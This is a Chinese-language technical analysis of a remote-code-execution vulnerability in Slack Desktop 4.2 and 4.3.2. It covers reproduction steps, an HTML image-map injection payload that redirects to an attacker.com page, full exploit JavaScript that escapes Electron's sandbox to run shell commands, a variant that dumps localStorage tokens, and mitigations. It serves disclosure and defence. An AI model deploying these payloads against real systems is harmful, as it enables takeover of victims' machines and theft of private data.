Slack Desktop 跳转漏洞实现 RCE 技术分析<\/h1>

漏洞概述<\/h2>
本漏洞利用 Slack Desktop 应用中的跳转漏洞实现远程代码执行(RCE)，影响 Slack Desktop 4.2 和 4.3.2 版本（跨平台：Mac\/Windows\/Linux）。攻击者可以通过多种方式（HTML注入、应用内重定向等）在受害者机器上执行任意命令。<\/p>

漏洞前提条件<\/h2>

存在以下任意一种漏洞利用入口：<\/p>

应用内重定向登录\/开放式重定向<\/li>
HTML注入<\/li>
JavaScript注入<\/li> <\/ul> <\/li>

攻击者需要拥有一个启用HTTPS的服务器来托管恶意payload<\/p> <\/li> <\/ol>

技术细节与复现步骤<\/h2>

攻击流程<\/h3>

攻击者准备阶段：<\/p>

在HTTPS服务器上上传RCE payload文件<\/li>
准备带有HTML注入的Slack Post<\/li>
将Post分享到频道或直接分享给目标用户<\/li> <\/ul> <\/li>

受害者交互阶段：<\/p>

用户在PC端点击被篡改的post文件<\/li>
HTML将桌面应用重定向到攻击者控制的网站<\/li>
攻击者网站返回RCE JavaScript代码<\/li>
利用跳转漏洞绕过Slack桌面环境限制<\/li>

泄露Electron对象并执行任意命令<\/li> <\/ul> <\/li> <\/ol>

HTML注入方法<\/h3>

方法一：直接编辑Slack Post JSON结构<\/h4>

创建新的Slack Post时，会在 https:\/\/files.slack.com<\/code> 生成包含以下结构的文件：<\/p>

{"full"<\/span>:"<p>content<\\/p>"<\/span>,"preview"<\/span>:"<p>content<\\/p>"<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

通过访问 \/api\/files.info<\/code> 获取私有文件URL，格式为：<\/p>
https:\/\/files.slack.com\/files-pri\/{TEAM_ID}-{FILE_ID}\/TITLE
<\/code><\/pre>
<\/li>

编辑JSON结构的两种方式：<\/p>

通过Web UI直接编辑：
https:\/\/{YOUR-TEAM-HOSTNAME}.slack.com\/files\/{YOUR-MEMBER-ID}\/{FILE-ID}\/title\/edit
<\/code><\/pre>
<\/li>
通过上传JSON文件并修改文件类型：

上传payload.json<\/code>文件<\/li>
拦截\/api\/files.edit<\/code>请求<\/li>
修改filetype<\/code>参数为docs<\/code><\/li>
<\/ol>
<\/li>
<\/ul>
<\/li>
<\/ol>
方法二：利用HTML注入payload<\/h4>
由于Slack对HTML标签有严格限制，开发了特殊的注入payload：<\/p>

<\/span><\/span><map<\/span> name<\/span>=<\/span>"slack-img"<\/span>>
<\/span><\/span><area<\/span> shape<\/span>=<\/span>"rect"<\/span> coords<\/span>=<\/span>"10000,10000 0,0"<\/span> href<\/span>=<\/span>"https:\/\/attacker.com\/t.html"<\/span> target<\/span>=<\/span>"_self"<\/span>>
<\/span><\/span><\/map<\/span>>
<\/span><\/span><\/code><\/pre>注意<\/strong>：<\/p>

必须使用Slack基础设施托管的图片<\/li>
usemap<\/code>属性引用图片<\/li>
area<\/code>标签实现点击重定向<\/li>
<\/ul>
RCE Exploit代码<\/h3>
攻击者网站上托管的利用代码：<\/p>
<html<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>  \/\/ 覆盖函数获取BrowserWindow对象
<\/span><\/span><\/span><\/span>  window.desktop<\/span>.delegate<\/span> =<\/span> {}
<\/span><\/span>  window.desktop<\/span>.delegate<\/span>.canOpenURLInWindow<\/span> =<\/span> () => true<\/span>
<\/span><\/span>  window.desktop<\/span>.window =<\/span> {}
<\/span><\/span>  window.desktop<\/span>.window.open<\/span> =<\/span> () => 1<\/span>
<\/span><\/span>  bw<\/span> =<\/span> window.open<\/span>('about:blank'<\/span>) \/\/ 泄露BrowserWindow类
<\/span><\/span><\/span><\/span>  nbw<\/span> =<\/span> new<\/span> bw<\/span>.constructor<\/span>({show<\/span>:<\/span> false<\/span>, webPreferences<\/span>:<\/span> {nodeIntegration<\/span>:<\/span> true<\/span>}}) \/\/ 创建带有nodeIntegration的新窗口
<\/span><\/span><\/span><\/span>  nbw<\/span>.loadURL<\/span>('about:blank'<\/span>) \/\/ 加载URL以便交互
<\/span><\/span><\/span><\/span>  nbw<\/span>.webContents<\/span>.executeJavaScript<\/span>('this.require("child_process").exec("open \/Applications\/Calculator.app")'<\/span>) \/\/ 执行命令
<\/span><\/span><\/span><\/span><\/script<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>平台适配<\/strong>：<\/p>

Windows: 替换命令为calc<\/code>或其他有效命令<\/li>
测试方法: 在Slack Desktop开发者工具控制台中直接执行JavaScript代码<\/li>
<\/ul>
数据窃取变种<\/h3>
无需执行命令即可访问私有数据的payload：<\/p>
<html<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><script<\/span>>
<\/span><\/span>  window.desktop<\/span>.delegate<\/span> =<\/span> {}
<\/span><\/span>  window.desktop<\/span>.delegate<\/span>.canOpenURLInWindow<\/span> =<\/span> () => true<\/span>
<\/span><\/span>  window.desktop<\/span>.window =<\/span> {}
<\/span><\/span>  window.desktop<\/span>.window.open<\/span> =<\/span> () => 1<\/span>
<\/span><\/span>  bw<\/span> =<\/span> window.open<\/span>('about:blank'<\/span>)
<\/span><\/span>  nbw<\/span> =<\/span> new<\/span> bw<\/span>.constructor<\/span>({show<\/span>:<\/span> false<\/span>}) \/\/ 不需要nodeIntegration
<\/span><\/span><\/span><\/span>  nbw<\/span>.loadURL<\/span>('https:\/\/app.slack.com\/robots.txt'<\/span>) \/\/ 获取用户完整环境
<\/span><\/span><\/span><\/span>  nbw<\/span>.webContents<\/span>.executeJavaScript<\/span>('alert(JSON.stringify(localStorage))'<\/span>)
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>备用payload存储方法：files.slack.com XSS<\/h3>
发现Slack服务器以明文存储电子邮件内容，可直接返回HTML而不强制下载：<\/p>

使用电子邮件客户端发送包含payload的纯文本邮件<\/li>
在Slack中通过"Open original"找到上传的HTML文件<\/li>
或通过调用\/api\/files.info<\/code>获取url_private<\/code>链接<\/li>
<\/ol>
漏洞影响<\/h2>


远程代码执行：<\/p>

访问私有文件、密钥、密码和机密信息<\/li>
获取内部网络访问权限<\/li>
<\/ul>
<\/li>

数据泄露：<\/p>

访问所有私人对话和文件<\/li>
获取本地存储的所有令牌<\/li>
<\/ul>
<\/li>

蠕虫化可能性：<\/p>

payload可设计为自动传播<\/li>
<\/ul>
<\/li>

其他风险：<\/p>

files.slack.com<\/code>上的XSS<\/li>
任意HTML内容注入（被Slack默认为可信）<\/li>
网络钓鱼攻击<\/li>
<\/ul>
<\/li>
<\/ol>
缓解措施<\/h2>


及时更新Slack Desktop到最新版本<\/p>
<\/li>

禁用或限制HTML内容在Slack中的渲染<\/p>
<\/li>

实施更严格的CSP策略<\/p>
<\/li>

对Electron应用进行安全加固：<\/p>

禁用不必要的Node.js集成<\/li>
限制BrowserWindow<\/code>的创建和使用<\/li>
<\/ul>
<\/li>

加强输入验证和过滤：<\/p>

对用户提交的JSON内容进行严格验证<\/li>
过滤危险的HTML标签和属性<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
该漏洞通过组合HTML注入和Electron安全缺陷，实现了在Slack Desktop应用中的远程代码执行。攻击者可以利用多种途径注入恶意代码，最终完全控制受害者的Slack客户端并访问所有私有数据。这凸显了富文本处理和Electron应用安全的重要性。<\/p>